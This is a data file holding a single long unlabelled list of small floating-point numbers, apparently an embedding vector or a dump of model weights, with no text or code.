-0.003919737879186869, -0.03679780289530754, -0.007813322357833385, -0.0005729224649257958, 0.015966638922691345, 0.0023930342867970467, 0.004243385978043079, -0.009532907046377659, -0.002620241604745388, 0.01965426467359066, -0.014828965999186039, 0.018464285880327225, 0.010199817828834057, 0.018346596509218216, 0.014175131916999817, 0.030599454417824745, 0.003383593400940299, -0.010480966418981552, 0.0005635236157104373, -0.002317843260243535, -0.006754110101610422, -0.021223466843366623, 0.016254324465990067, 0.007891782559454441, -0.01659431867301464, 0.0022818823345005512, 0.001529155415482819, 0.016973543912172318, 0.00829715933650732, -0.03653627261519432, -0.00015232300211209804, 0.012024016119539738, -0.03836700692772865, -0.004658570513129234, -0.011932479217648506, -0.005969509016722441, -0.004645493812859058, -0.004132234025746584, -0.030730221420526505, 0.012109014205634594, 0.003939352929592133, -0.024871863424777985, -0.024191875010728836, 0.01799352467060089, -0.020295022055506706, 0.023616502061486244, 0.018085062503814697, 0.018856586888432503, 0.019549651071429253, -0.019144274294376373, -0.03567320853471756, 0.021942684426903725, -0.0032691725064069033, -0.023917265236377716, -0.014645892195403576, 0.024976477026939392, 0.005070486571639776, 0.0016198749653995037, -0.0016174230258911848, 0.015064346604049206, -0.006472961511462927, 0.0022344794124364853, -0.021014239639043808, 0.00616892846301198, -0.01645047590136528, 0.007237947545945644, -0.004073388874530792, -0.04283923655748367, -0.005240483209490776, -0.008166392333805561, 0.012573237530887127, 0.014933579601347446, -0.012534007430076599, -0.027801042422652245, -0.01562664471566677, -0.0017506418516859412, -0.003962236922234297, -0.02034732885658741, -0.0017718914896249771, 0.01656816527247429, 0.016502782702445984, 0.019955027848482132, -0.020242715254426003, 0.025865692645311356, -0.011965171433985233, -0.004674916621297598, 0.0020138102117925882, -0.0010142606915906072, -0.03873315453529358, 0.036457810550928116, 0.0390469953417778, -0.004684723913669586, -0.02464956045150757, -0.012860924005508423, 0.003383593400940299, -0.0006440269644372165, -0.002600626554340124, 0.035725515335798264, -0.027905656024813652, 0.017875835299491882, 0.0016852583503350616, -0.003195615950971842, 0.000135466325446032, -0.0012455546529963613, 0.026584910228848457, 0.013351299799978733, -0.03807932138442993, -0.015286650508642197, 0.0007282081642188132, -0.019261963665485382, -0.0005353270098567009, -0.03122713416814804, 0.01702585071325302, -0.007904859259724617, 0.0530129000544548, 0.00024518792633898556, 0.06020507961511612, 0.021955762058496475, 0.020988086238503456, -0.025564927607774734, -0.009055607952177525, 0.027827195823192596, 0.014972809702157974, -0.038523927330970764, -0.013155150227248669, 0.026284147053956985, -0.0018732358003035188, -0.014122825115919113, 0.003373785875737667, 0.019340423867106438, -0.018451208248734474, 0.00577989686280489, 0.005443172063678503, -0.0010608464945107698, -0.006453346461057663, -0.006656034849584103, 0.03243019059300423, 0.01456743199378252, -0.009572137147188187, 0.03290095180273056, 0.004795875865966082, 0.0209096260368824, 0.001304399804212153, -0.009225604124367237, -0.0015054539544507861, -0.013625910505652428, -0.012161321006715298, -0.013370915316045284, 0.007120257709175348, -0.006440269760787487, 0.007336022797971964, -0.032116349786520004, 0.010343661531805992, -0.018202751874923706, -0.01824198290705681, -0.002087366534397006, -0.005655668210238218, -0.0019206388387829065, 0.0006350367330014706, 0.03010253980755806, 0.014606662094593048, -0.008146777749061584, 0.033267099410295486, -0.007970242761075497, -0.017509687691926956, 0.02257036603987217, -0.0029438897036015987, 0.002375053707510233, 0.013357838615775108, -0.024165721610188484, -0.01554818358272314, -0.007682555355131626, -0.011840942315757275, 0.00682603195309639, -0.017457380890846252, -0.01699969731271267, -0.018882740288972855, -0.0006538344896398485, -0.03261326253414154, 0.011200184933841228, -0.010912497527897358, 0.018477361649274826, 0.01658124290406704, -0.02343342825770378, 0.007519096601754427, 0.024610329419374466, 0.0022328447084873915, -0.0015267034759745002, -0.050920628011226654, 0.01591433212161064, -0.031017908826470375, 0.03297941014170647, -0.02064809389412403, -0.020033488050103188, -0.035908591002225876, 0.025054937228560448, 0.008153315633535385, 0.032822489738464355, -0.0020219830330461264, 0.025434160605072975, 0.02746104821562767, -0.007944089360535145, -0.0005978498957119882, -0.02079193666577339, -0.01018020324409008, -0.01686893031001091, 0.028690258041024208, 0.005577208008617163, -0.005877972114831209, -0.011939018033444881, 0.0016354034887626767, 0.029187170788645744, -0.0018045831238850951, -0.056386686861515045, -0.007035259157419205, 0.012010939419269562, 0.0024665906094014645, 0.0065579600632190704, 0.019680418074131012, -0.006799878552556038, 0.020556556060910225, -0.015365110710263252, 0.015692027285695076, 0.002847449155524373, 0.018477361649274826, -0.028376417234539986, -0.01122633833438158, 0.02007271908223629, -0.007591018453240395, 0.009853285737335682, 0.001835640287026763, 0.0022998626809567213, -0.03805316612124443, -0.03567320853471756, 0.003651665523648262, 0.03828854858875275, 0.010840576142072678, -0.06004815921187401, -0.003363978350535035, 0.00013934847083874047, -0.0019680417608469725, -0.0019075621385127306, -0.007152949459850788, -0.013782830908894539, -0.013743600808084011, 0.006580844055861235, -0.0018617936875671148, 0.011932479217648506, -0.01669893227517605, 0.0009300795500166714, -0.002342361956834793, -0.0005312405410222709, -0.009147144854068756, -0.0036058970727026463, 0.00411261897534132, 0.018843509256839752, -0.015705104917287827, -0.03399939462542534, -0.017352767288684845, -0.02594415284693241, 0.01233785692602396, 0.01101057231426239, 0.03300556540489197, -0.002026886912062764, 0.01106941793113947, 0.00024988738005049527, -0.031122520565986633, 0.02536877803504467, -0.02496340125799179, -0.0024110146332532167, -0.00028339639538899064, 0.06444192677736282, 0.001848716987296939, -0.023603424429893494, -0.004681454971432686, -0.0037235873751342297, 0.005309136118739843, 0.000515711959451437, 0.0320640429854393, -0.032665569335222244, 0.012174397706985474, -0.02396957203745842, 0.025826461613178253, -0.0083625428378582, -0.0050802938640117645, -0.010657502338290215, 0.0030076387338340282, 0.008591385558247566, -0.017078157514333725, 0.017928142100572586, -0.018647359684109688, 0.011344028636813164, 0.04223770648241043, 0.010088666342198849, 0.004586649127304554, 0.011736328713595867, -0.009617905132472515, -0.008872534148395061, 0.02241344563663006, -0.001794775715097785, 0.0027444702573120594, -0.03373786062002182, 0.026101073250174522, -0.005822395905852318, 0.001032241154462099, 0.011605561710894108, -0.0009308968437835574, 0.006799878552556038, -0.01574433408677578, -0.019601957872509956, 0.012030554935336113, 0.016215095296502113, 0.006466423161327839, 0.00005726159724872559, 0.020412713289260864, 0.005273174960166216, 0.010134434327483177, 0.005178369116038084, -0.0035960895475000143, 0.02884717658162117, -0.003292056731879711, -0.0030125423800200224, -0.02591799944639206, 0.00766947865486145, -0.019981181249022484, -0.003432631026953459, 0.014109748415648937, 0.03889007493853569, 0.004233578220009804, -0.017038926482200623, -0.011049802415072918, -0.017208924517035484, 0.013926674611866474, 0.034627072513103485, 0.014776659198105335, 0.018856586888432503, -0.021785765886306763, -0.007375252898782492, -0.0011270472314208746, 0.027801042422652245, -0.015587413683533669, -0.013612833805382252, -0.0068783387541770935, -0.004687993321567774, -0.012311703525483608, -0.018372749909758568, 0.009565598331391811, 0.03975313529372215, -0.00019482224888633937, -0.01129825972020626, -0.0015798276290297508, -0.023341890424489975, 0.005253559909760952, 0.01240324042737484, 0.014449741691350937, -0.020412713289260864, 0.011023649014532566, -0.012632082216441631, -0.009709442034363747, -0.008656768128275871, -0.0007874619332142174, -0.010330584831535816, 0.03847162052989006, -0.0032021543011069298, 0.0125405453145504, 0.011487872339785099, 0.009349833242595196, -0.015090500004589558, 0.005456248763948679, 0.01038942951709032, 0.006976414006203413, -0.004714146722108126, 0.020412713289260864, 0.00717910286039114, -0.02148500084877014, -0.01686893031001091, -0.01247516181319952, 0.007826399058103561, -0.006714880000799894, 0.01740507408976555, 0.0006052055396139622, 0.0017342959763482213, 0.020988086238503456, 0.02897794358432293, 0.018085062503814697, 0.021354233846068382, -0.002100443234667182, 0.008709074929356575, -0.015012039802968502, 0.01393975131213665, 0.0023162085562944412, -0.0006325848517008126, 0.009127529338002205, 0.014148978516459465, -0.006427193060517311, 0.0008450810564681888, -0.011605561710894108, 0.02020348608493805, 0.024048032239079475, 0.019628111273050308, -0.001262717880308628, 0.02217806503176689, -0.007277177646756172, -0.0026692792307585478, 0.030207153409719467, -0.018503515049815178, -0.028350263833999634, -0.016489705070853233, 0.004907027818262577, 0.008676383644342422, 0.022674979642033577, -0.00006604749796679243, -0.026728753000497818, -0.012802079319953918, -0.010304431430995464, 0.009088299237191677, 0.029448704794049263, -0.008526002056896687, -0.019863491877913475, -0.017470456659793854, 0.0040897345170378685, 0.036039356142282486, 0.016110481694340706, 0.006714880000799894, 0.002816392108798027, 0.0334240198135376, 0.008584846742451191, 0.0016623741248622537, 0.010467889718711376, -0.001543866703286767, -0.001807852298952639, 0.02691182680428028, -0.017091233283281326, 0.03245634213089943, -0.01643739826977253, -0.016777392476797104, -0.004707608371973038, -0.02102731727063656, -0.04351922497153282, 0.022073451429605484, 0.008839841932058334, 0.014580508694052696, 0.0019941951613873243, -0.01883043348789215, 0.0030092732049524784, -0.00212332746013999, -0.010239047929644585, 0.007388329599052668, 0.002397937932983041, -0.025041861459612846, -0.0001691796787781641, 0.015312803909182549, 0.0060708532109856606, 0.006296426057815552, 0.04835759848356247, 0.00676064845174551, 0.003645127173513174, 0.022073451429605484, 0.007623710203915834, -0.03957006335258484, -0.04793914407491684, -0.02311958745121956, 0.008676383644342422, -0.007944089360535145, -0.013704370707273483, -0.0024126493372023106, 0.0031351363286376, 0.008552155457437038, -0.01518203690648079, -0.029448704794049263, 0.01155979372560978, 0.034914761781692505, -0.01979810744524002, 0.010330584831535816, -0.0017375651514157653, -0.007538711652159691, 0.02343342825770378, 0.0027183168567717075, -0.0011809885036200285, 0.010225971229374409, -0.00927791092544794, -0.010552888736128807, -0.02399572543799877, 0.038105472922325134, -0.003074656706303358, 0.006214696913957596, -0.012775925919413567, 0.018346596509218216, 0.009186374954879284, -0.004583379719406366, -0.0024731289595365524, -0.01365206390619278, -0.0009791171178221703, -0.002880140906199813, 0.004678185563534498, 0.008029087446630001, 0.006950260605663061, -0.009173298254609108, 0.0115009481087327, 0.012926307506859303, 0.0015986253274604678, 0.012815156020224094, 0.014515125192701817, -0.004681454971432686, -0.014868196099996567, 0.013246686197817326, 0.020281946286559105, -0.006937183905392885, -0.013187841512262821, -0.005979316309094429, 0.011435565538704395, -0.0024714942555874586, -0.0024126493372023106, 0.03983159735798836, 0.00725102424621582, 0.014828965999186039, 0.005384326912462711, 0.008127162232995033, 0.032691724598407745, 0.0006219600327312946, 0.01855582185089588, 0.01456743199378252, 0.04192386567592621, -0.007198717445135117, -0.016908159479498863, 0.0014163689920678735, -0.013482066802680492, 0.014776659198105335, 0.012383624911308289, 0.004674916621297598, 0.011821327731013298, -0.006839108653366566, -0.00457030301913619, 0.010232510045170784, -0.019314270466566086, -0.01135710533708334, -0.007388329599052668, -0.00018899902352131903, -0.00809447094798088, 0.017928142100572586, -0.007022182457149029, 0.006466423161327839, 0.01909196749329567, 0.0030501377768814564, -0.02287113107740879, -0.002126596635207534, 0.0058191269636154175, 0.012612467631697655, -0.027905656024813652, 0.001310938154347241, 0.006685457658022642, -0.008611000142991543, 0.009330217726528645, -0.0038085859268903732, 0.0013722351286560297, -0.012174397706985474, -0.019680418074131012, -0.00711371935904026, -0.007172564510256052, 0.012854386121034622, -0.007447174750268459, 0.00786562915891409, 0.0014433396281674504, -0.02034732885658741, 0.001574106514453888, -0.028925636783242226, -0.021798841655254364, -0.007015644107013941, -0.003014177083969116, 0.03321479260921478, 0.015142806805670261, -0.002584280911833048, 0.017522763460874557, -0.0025107243563979864, -0.015012039802968502, -0.03585628420114517, 0.001295409514568746, -0.009310603141784668, -0.0037464716006070375, -0.020595787093043327, -0.008408311754465103, 0.029657931998372078, -0.029736392199993134, 0.003860892727971077, 0.019327348098158836, 0.006208158563822508, -0.006505653262138367, 0.037268564105033875, -0.01575741171836853, 0.010082127526402473, -0.011036725714802742, -0.007054874207824469, 0.018843509256839752, 0.025068014860153198, 0.030599454417824745, -0.02910871058702469, -0.004521265625953674, -0.0014237245777621865, -0.028637951239943504, -0.026964133605360985, 0.0012422854779288173, 0.007447174750268459, -0.025054937228560448, -0.003547052154317498, -0.025957228615880013, 0.001789871952496469, 0.017470456659793854, -0.007309869397431612, -0.027957962825894356, 0.004171464126557112, 0.009120991453528404, 0.0060773915611207485, -0.004459151066839695, -0.01851659268140793, -0.017588147893548012, 0.01601894572377205, 0.003684357274323702, -0.02202114462852478, -0.00047811647527851164, 0.00209063570946455, 0.026414914056658745, -0.0174312274903059, 0.004910296760499477, 0.004282616078853607, -0.016332784667611122, -0.0070679509080946445, -0.025277242064476013, -0.021236544474959373, 0.00969636533409357, -0.008349466137588024, -0.025708772242069244, 0.02245267666876316, -0.018215829506516457, 0.03460092097520828, 0.00623431196436286, 0.014122825115919113, -0.03470553457736969, -0.003176000900566578, 0.003586282255128026, -0.009009839035570621, -0.017810450866818428, -0.008264468051493168, -0.014737429097294807, 0.008101008832454681, -0.003569936379790306, 0.007917935959994793, -0.01699969731271267, 0.0011303164064884186, 0.005070486571639776, 0.001581462100148201, 0.02158961445093155, -0.027957962825894356, -0.007741400506347418, 0.013547450304031372, 0.003622242948040366, -0.00411261897534132, -0.03661473095417023, 0.009441370144486427, 0.0042858850210905075, 0.01136364322155714, 0.006561229005455971, 0.00107882684096694, 0.009441370144486427, -0.017888911068439484, -0.016254324465990067, 0.0040766578167676926, 0.004419920966029167, 0.02130192704498768, 0.011396335437893867, 0.01492050290107727, 0.011115185916423798, 0.009859823621809483, -0.0035110912285745144, -0.022073451429605484, -0.0026137032546103, -0.0023031318560242653, -0.046736087650060654, 0.01135710533708334, -0.007852552458643913, -0.02510724402964115, -0.01450204849243164, 0.004531072918325663, 0.0074079446494579315, 0.009382524527609348, -0.026833366602659225, 0.004861259367316961, -0.017038926482200623, 0.023616502061486244, 0.017222000285983086, 0.010428659617900848, -0.004580110777169466, -0.016071252524852753, 0.03441784903407097, -0.0027542777825146914, -0.024741096422076225, 0.006482768803834915, 0.011174031533300877, 0.010533273220062256, -0.013115920126438141, -0.014619738794863224, 0.01757507026195526, 0.0006808051839470863, 0.025303393602371216, -0.003671280574053526, 0.01080134604126215, 0.014188208617269993, -0.003393400926142931, -0.02047809585928917, -0.021916531026363373, 0.0029438897036015987, 0.01727430708706379, 0.017457380890846252, 0.008107547648251057, -0.0018830433255061507, -0.023028049618005753, 0.000774793850723654, 0.02719951421022415, -0.012422855012118816, 0.011527101509273052, 0.00038392344140447676, -0.014972809702157974, 0.04158387333154678, -0.01767968386411667, -0.0003495971322990954, 0.019353501498699188, -0.010337123647332191, 0.005403941962867975, 0.006819493602961302, -0.01450204849243164, -0.010206356644630432, 0.022256525233387947, 0.006780263502150774, 0.004939719568938017, -0.011925941333174706, 0.00026643756427802145, -0.008316774852573872, -0.0037497407756745815, -0.003815124277025461, -0.0000866841510287486, 0.0037530099507421255, -0.0002864612324628979, -0.01575741171836853, 0.023054203018546104, -0.022910360246896744, -0.00030566760688088834, -0.004308769479393959, 0.006685457658022642, 0.021537307649850845, 0.03454861417412758, -0.003413015976548195, -0.0026545680593699217, 0.004328384064137936, 0.004857990425080061, -0.019157350063323975, 0.0020890012383461, 0.002847449155524373, -0.005949893966317177, 0.03538552299141884, -0.007826399058103561, -0.008741767145693302, 0.0029226401820778847, 0.01163171511143446, 0.015692027285695076, 0.0009153682622127235, 0.0034816686529666185, -0.003367247525602579, 0.010539812035858631, 0.00453434232622385, -0.014868196099996567, -0.007035259157419205, 0.01591433212161064, 0.0036058970727026463, 0.018202751874923706, -0.0063487328588962555, -0.0053581735119223595, -0.015430494211614132, -0.010062512941658497, 0.006064314860850573, 0.016267402097582817, -0.006976414006203413, -0.0042237709276378155, 0.00795716606080532, 0.026375683024525642, -0.002092270413413644, 0.0180981382727623, 0.02036040648818016, -0.012854386121034622, 0.009885977022349834, -0.004338191822171211, 0.019052736461162567, 0.011664407327771187, 0.002569569507613778, -0.01741814985871315, -0.022518059238791466, -0.041165418922901154, -0.010624810121953487, 0.014685122296214104, 0.02105347067117691, -0.0011196915293112397, -0.017954295501112938, -0.013612833805382252, -0.014868196099996567, 0.00581585755571723, -0.0036058970727026463, 0.004553957376629114, -0.0031335018575191498, -0.0033410941250622272, -0.000777245732024312, -0.0008843111572787166, -0.019955027848482132, -0.0080225495621562, -0.0022279410623013973, 0.010703270323574543, 0.017065079882740974, -0.013089766725897789, -0.04349306970834732, 0.006656034849584103, 0.01603202149271965, -0.0007412848644889891, 0.002079193713143468, -0.005757012404501438, -0.010977881029248238, 0.005606630817055702, -0.0010919035412371159, -0.0011744501534849405, -0.033267099410295486, -0.0022377485875040293, -0.003323113778606057, -0.00617219740524888, 0.015495877712965012, -0.0061525823548436165, -0.008146777749061584, -0.015221267007291317, -0.01686893031001091, -0.00891830213367939, -0.016973543912172318, -0.020543480291962624, -0.014750505797564983, 0.016241248697042465, -0.027565661817789078, -0.005590284708887339, 0.0029635047540068626, 0.008558693341910839, -0.030154846608638763, -0.015574336983263493, 0.007931012660264969, 0.0029635047540068626, 0.0114944102242589, -0.012370548211038113, -0.0035339754540473223, -0.012978614307940006, 0.01867351308465004, -0.004586649127304554, 0.0037791633512824774, 0.0026725484058260918, -0.008081394247710705, -0.007715247105807066, -0.0030288882553577423, 0.0015185305383056402, 0.011834404431283474, 0.013142073526978493, 0.00028748283511959016, -0.006450077053159475, 0.0020219830330461264, -0.0014000231167301536, -0.00011084537982242182, 0.005119523964822292, -0.00913406815379858, 0.01234439481049776, -0.013174764811992645, 0.03164558857679367, 0.00829715933650732, -0.01966734044253826, -0.01769276149570942, -0.03303171694278717, -0.021118853241205215, -0.02649337239563465, 0.003923006821423769, -0.0014343494549393654, 0.02008579485118389, -0.016921237111091614, 0.021537307649850845, 0.02634952962398529, 0.002821295754984021, 0.002626779954880476, -0.017378920689225197, -0.01896120049059391, -0.014488971792161465, -0.006806416902691126, 0.007931012660264969, 0.0030321574304252863, -0.011827865615487099, 0.006930645555257797, 0.02144577167928219, 0.024152645841240883, 0.016842776909470558, -0.00030873247305862606, 0.018843509256839752, 0.017248153686523438, 0.009807516820728779, -0.016515858471393585, 0.014410511590540409, -0.01260592881590128, 0.00048751532449387014, -0.004727223422378302, 0.015979714691638947, 0.013704370707273483, -0.01184748113155365, -0.0013910328270867467, 0.0007061412325128913, 0.028271803632378578, -0.0057439361698925495, 0.005148946773260832, -0.011801712214946747, 0.005985854659229517, 0.008199084550142288, -0.016332784667611122, 0.02385188266634941, 0.011409412138164043, -0.01883043348789215, 0.007329484447836876, -0.022766517475247383, 0.01727430708706379, -0.004586649127304554, -0.010199817828834057, 0.0019909259863197803, 0.009493676945567131, 0.04255154728889465, 0.002824564930051565, 0.004560495726764202, -0.011625177226960659, -0.00676064845174551, 0.008617538958787918, -0.013730524107813835, -0.009251757524907589, -0.002860525855794549, -0.013952828012406826, -0.010422121733427048, 0.006982952356338501, -0.01136364322155714, -0.015665873885154724, 0.015796640887856483, 0.01658124290406704, 0.00659065181389451, 0.0034718611277639866, 0.004524534568190575, 0.00021351782197598368, -0.011553254909813404, 0.013795907609164715, -0.014580508694052696, -0.002572838682681322, 0.007630248554050922, 0.0018961200257763267, 0.012239781208336353, 0.018738895654678345, 0.004697800613939762, 0.03834085538983345, -0.0024796673096716404, 0.005959701258689165, 0.00815985444933176, 0.002569569507613778, 0.0160450991243124, -0.00934329442679882, 0.03141020983457565, 0.016411244869232178, -0.01893504709005356, -0.0017244884511455894, 0.005835472606122494, 0.012860924005508423, -0.017731990665197372, -0.019981181249022484, 0.0029651394579559565, 0.011147878132760525, 0.01540434081107378, 0.004331653472036123, 0.0011450276942923665, 0.0017424689140170813, -0.006930645555257797, 0.02342035062611103, -0.011134801432490349, 0.0050802938640117645, -0.0055477856658399105, 0.006433731410652399, -0.000786235963460058, -0.004596456419676542, 0.027251821011304855, 0.00814023893326521, -0.009578675031661987, 0.024623407050967216, -0.004831837024539709, 0.0014286283403635025, 0.005181638058274984, 0.003419554326683283, -0.008826765231788158, -0.02381265163421631, 0.03559475019574165, -0.003563398029655218, -0.0019762148149311543, 0.01450204849243164, -0.006721418350934982, -0.020948857069015503, -0.003298595082014799, 0.02633645385503769, 0.010108280926942825, -0.0022328447084873915, 0.02774873562157154, 0.014972809702157974, -0.011167492717504501, -0.03277018293738365, -0.006956798955798149, -0.008284082636237144, 0.003824931802228093, -0.011108648031949997, 0.020281946286559105, 0.007996396161615849, 0.014083595015108585, -0.000505904434248805, -0.010402506217360497, 0.0072117941454052925, 0.0037464716006070375, -0.005397403612732887, 0.01701277308166027, 0.045245345681905746, 0.0011638253927230835, -0.011036725714802742, 0.007264100946485996, -0.00002306299029442016, -0.0007396502769552171, 0.012821693904697895, -0.0076040951535105705, -0.007577941752970219, 0.0032675378024578094, 0.028088729828596115, 0.005233944859355688, 0.008414849638938904, 0.016672778874635696, 0.008205622434616089, -0.007532173302024603, -0.005675283260643482, 0.007434098049998283, 0.009323679842054844, 0.02062194049358368, -0.001541414763778448, 0.023250354453921318, 0.025421084836125374, -0.007931012660264969, -0.017901988700032234, 0.00795716606080532, -0.005570669658482075, 0.006208158563822508, 0.006561229005455971, -0.008637153543531895, 0.009192912839353085, -0.003164558904245496, -0.0027150476817041636, 0.008284082636237144, 0.0028049498796463013, -0.007244485896080732, -0.0035437829792499542, -0.01191940251737833, 0.009997129440307617, 0.0005647495272569358, -0.011625177226960659, -0.008859457448124886, 0.017509687691926956, 0.007237947545945644, -0.006012008059769869, -0.024322642013430595, 0.002322746906429529, -0.030311767011880875, 0.013560527004301548, -0.00571451336145401, 0.013900521211326122, -0.0013697831891477108, 0.007499481551349163, 0.0018552553374320269, 0.02464956045150757, -0.0052960594184696674, -0.0019582342356443405, -0.00969636533409357, 0.005724321119487286, -0.014776659198105335, -0.031854815781116486, -0.013207457028329372, -0.003622242948040366, 0.007192179095000029, -0.02410033904016018, 0.010899420827627182, -0.009585213847458363, 0.007767553441226482, 0.01631970889866352, -0.008480233140289783, 0.01400513481348753, -0.01588817872107029, -0.0006722235702909529, -0.002020348561927676, 0.0070810276083648205, -0.006217965856194496, -0.004687993321567774, 0.010428659617900848, 0.007571403402835131, -0.01939273066818714, 0.011487872339785099, 0.0011540178675204515, -0.01646355167031288, 0.0023766884114593267, -0.027670275419950485, -0.00003325361467432231, 0.0006987855886109173, 0.020857319235801697, 0.01051365863531828, 0.03195942938327789, -0.008421388454735279, -0.0278795026242733, 0.011330951936542988, -0.022884206846356392, 0.004419920966029167, -0.01185401901602745, 0.000038566016883123666, -0.013612833805382252, 0.001999099040403962, -0.02189037762582302, -0.011239415034651756, -0.010291354730725288, 0.0026512988843023777, 0.005910663865506649, -0.007545250002294779, 0.018150445073843002, 0.0019647725857794285, -0.0015749238664284348, -0.02662413939833641, -0.004972411319613457, -0.015600490383803844, -0.0017604493768885732, 0.01879120245575905, -0.0076106335036456585, 0.019052736461162567, 0.012808617204427719, -0.00016182403487619013, -0.015992792323231697, -0.019484268501400948, -0.022504983469843864, 0.0022361138835549355, 0.016672778874635696, -0.012213627807796001, -0.01450204849243164, -0.012573237530887127, 0.01058558002114296, 0.012991691008210182, 0.0006750841275788844, -0.019301194697618484, -0.014828965999186039, 0.0361962765455246, -0.012769387103617191, -0.006031623110175133, -0.027644122019410133, -0.005606630817055702, -0.017640454694628716, -0.004419920966029167, 0.0017539110267534852, 0.007473328150808811, 0.011514024809002876, -0.024728020653128624, 0.007192179095000029, -0.016136635094881058, -0.015195113606750965, 0.001083730603568256, 0.0005463604466058314, 0.020399635657668114, 0.010023282840847969, -0.02079193666577339, -0.016908159479498863, -0.0011245952919125557, 0.002164192032068968, -0.0050933705642819405, 0.0009676750632934272, -0.004903758410364389, 0.003192346775904298, -0.00035266196937300265, -0.01206978503614664, 0.005544516257941723, -0.015234343707561493, -0.01393975131213665, 0.034783992916345596, 0.0223219096660614, 0.005855087656527758, 0.013128996826708317, 0.012985153123736382, -0.019013507291674614, -0.006904492154717445, 0.003962236922234297, 0.03886392340064049, 0.008205622434616089, -0.005047602113336325, 0.00975521095097065, 0.017496610060334206, -0.002285151509568095, 0.020295022055506706, 0.008460618555545807, -0.015508954413235188, -0.03263941779732704, 0.0011082494165748358, 0.014253592118620872, -0.00047566459397785366, -0.00927791092544794, 0.008336389437317848, 0.030416380614042282, 0.022491905838251114, -0.02845487743616104, -0.006453346461057663, -0.01505126990377903, 0.013560527004301548, 0.013978981412947178, 0.0031563860829919577, 0.01868658885359764, 0.002388130407780409, -0.0060087391175329685, 0.013115920126438141, -0.0027150476817041636, -0.009500214830040932, 0.006535075604915619, 0.008944455534219742, -0.021158084273338318, 0.017352767288684845, 0.011873634532094002, 0.00571124441921711, -0.018320443108677864, -0.014881272800266743, 0.007519096601754427, -0.019562726840376854, -0.02413957007229328, -0.004939719568938017, 0.0125405453145504, 0.0034783994778990746, 0.0074144829995930195, -0.011285183019936085, 0.009997129440307617, 0.013429760001599789, -0.004341460764408112, 0.009774825535714626, 0.004197617527097464, 0.012298626825213432, 0.002567935036495328, 0.019889645278453827, -0.005626245867460966, -0.01106941793113947, 0.006057776510715485, 0.00414857966825366, -0.016515858471393585, -0.008924840949475765, 0.03316248580813408, -0.004527803976088762, -0.023381121456623077, -0.0202296394854784, 0.014332052320241928, -0.007231409195810556, 0.012991691008210182, 0.009114452637732029, -0.012592852115631104, 0.02104039303958416, -0.015286650508642197, 0.010127896443009377, 0.005397403612732887, -0.023760344833135605, -0.0031972506549209356, -0.0062670037150382996, 0.003906661178916693, 0.0008450810564681888, -0.01841197907924652, 0.007891782559454441, 0.0008802246884442866, -0.017588147893548012, -0.00006502588075818494, 0.004678185563534498, -0.015940485522150993, -0.002008906565606594, 0.0014809351414442062, -0.015195113606750965, -0.008833304047584534, 0.0005516728269867599, 0.002062847837805748, 0.000542682595551014, -0.016816623508930206, 0.01546972431242466, 0.012821693904697895, 0.016345862299203873, 0.011213261634111404, 0.015600490383803844, 0.0043676141649484634, 0.015325880609452724, 0.009670211933553219, 0.006976414006203413, 0.0039655063301324844, -0.03648396581411362, -0.0070810276083648205, 0.02897794358432293, -0.0014899253146722913, -0.00012647610856220126, -0.02535570040345192, -0.010003667324781418, -0.02047809585928917, 0.010350199416279793, -0.02803642302751541, -0.008807150647044182, -0.007538711652159691, -0.03334555774927139, 0.008611000142991543, -0.023642655462026596, 0.007159487809985876, 0.013482066802680492, -0.02454494684934616, 0.00662661250680685, 0.01949734427034855, -0.003553590504452586, 0.013070151209831238, 0.0027526430785655975, -0.005724321119487286, 0.0070744892582297325, 0.01949734427034855, 0.01142248883843422, 0.012292088009417057, 0.011991324834525585, 0.0072183324955403805, -0.015208190307021141, 0.005037794820964336, 0.024296488612890244, 0.0208965502679348, 0.01728738285601139, -0.002054674783721566, -0.024898016825318336, 0.009840209037065506, 0.0021511155646294355, 0.006486038211733103, 0.003880507545545697, -0.021118853241205215, -0.0012463720049709082, 0.009729057550430298, -0.006747571751475334, 0.016489705070853233, 0.026140302419662476, -0.003347632475197315, 0.02199499122798443, -0.013442836701869965, 0.011690560728311539, -0.013495143502950668, 0.0007817408768460155, -0.012481700628995895, -0.000021862590074306354, -0.001572471926920116, 0.012004401534795761, -0.015195113606750965, 0.008284082636237144, -0.0074014062993228436, 0.010690193623304367, 0.008055240847170353, -0.025447238236665726, -0.012200551107525826, -0.006603728514164686, -0.01937965489923954, 0.012632082216441631, -0.01643739826977253, -0.0153389573097229, 0.011540178209543228, 0.012396701611578465, -0.014724352397024632, 0.01211555302143097, 0.027487201616168022, 0.009853285737335682, -0.008990224450826645, -0.009663674049079418, 0.011154416017234325, -0.014750505797564983, -0.011187108233571053, 0.0016656432999297976, 0.029291784390807152, 0.0016885275254026055, 0.036876264959573746, -0.006155851762741804, 0.004920104518532753, -0.010984418913722038, -0.004907027818262577, 0.003877238603308797, -0.029187170788645744, 0.007950627245008945, -0.004933181218802929, -0.025839539244771004, -0.012383624911308289, 0.0008753209258429706, 0.009781363420188427, 0.006211427506059408, 0.001033058506436646, -0.039674676954746246, 0.018202751874923706, 0.011514024809002876, -0.018215829506516457, -0.0031907123047858477, -0.002867064205929637, 0.010579042136669159, -0.003131867153570056, 0.006106813903898001, -0.006459884811192751, -0.0010812787804752588, -0.002559761982411146, 0.008872534148395061, 0.014345129020512104, 0.014737429097294807, -0.0003798369725700468, -0.01185401901602745, 0.00015007544425316155, 0.022975744679570198, -0.00571124441921711, -0.012906692922115326, -0.003195615950971842, -0.014946656301617622, 0.019693493843078613, -0.008101008832454681, 0.0017326613888144493, -0.0019042929634451866, -0.00032323942286893725, -0.000641983759123832, 0.014397434890270233, -0.02005964145064354, -0.025303393602371216, 0.010350199416279793, -0.023616502061486244, 0.016816623508930206, -0.013495143502950668, 0.0011728155659511685, 0.00989251583814621, -0.00857830885797739, -0.020818090066313744, -0.0016027117380872369, -0.01024558674544096, -0.0019402537727728486, -0.003893584245815873, 0.003929545171558857, 0.006047968752682209, -0.0024763981346040964, 0.021981915459036827, -0.041871558874845505, -0.023917265236377716, -0.009232142940163612, -0.006378155201673508, 0.03360709175467491, -0.005838742014020681, -0.02049117349088192, -0.0007429194520227611, 0.00010778052819659933, 0.01784968189895153, 0.01142248883843422, -0.0005684273783117533, 0.005953162908554077, 0.0004151848843321204, -0.0032217693515121937, -0.0025041860062628984, 0.00004002182322437875, -0.012449008412659168, -0.027356434613466263, -0.0008074856013990939, 0.0037268565502017736, -0.028664104640483856, -0.000012508415238698944, 0.013547450304031372, -0.0055543240159749985, 0.010631348937749863, 0.012978614307940006, -0.01246862392872572, 0.004527803976088762, 0.002880140906199813, 0.017784297466278076, -0.017614301294088364, 0.0045572263188660145, 0.009323679842054844, -0.014122825115919113, 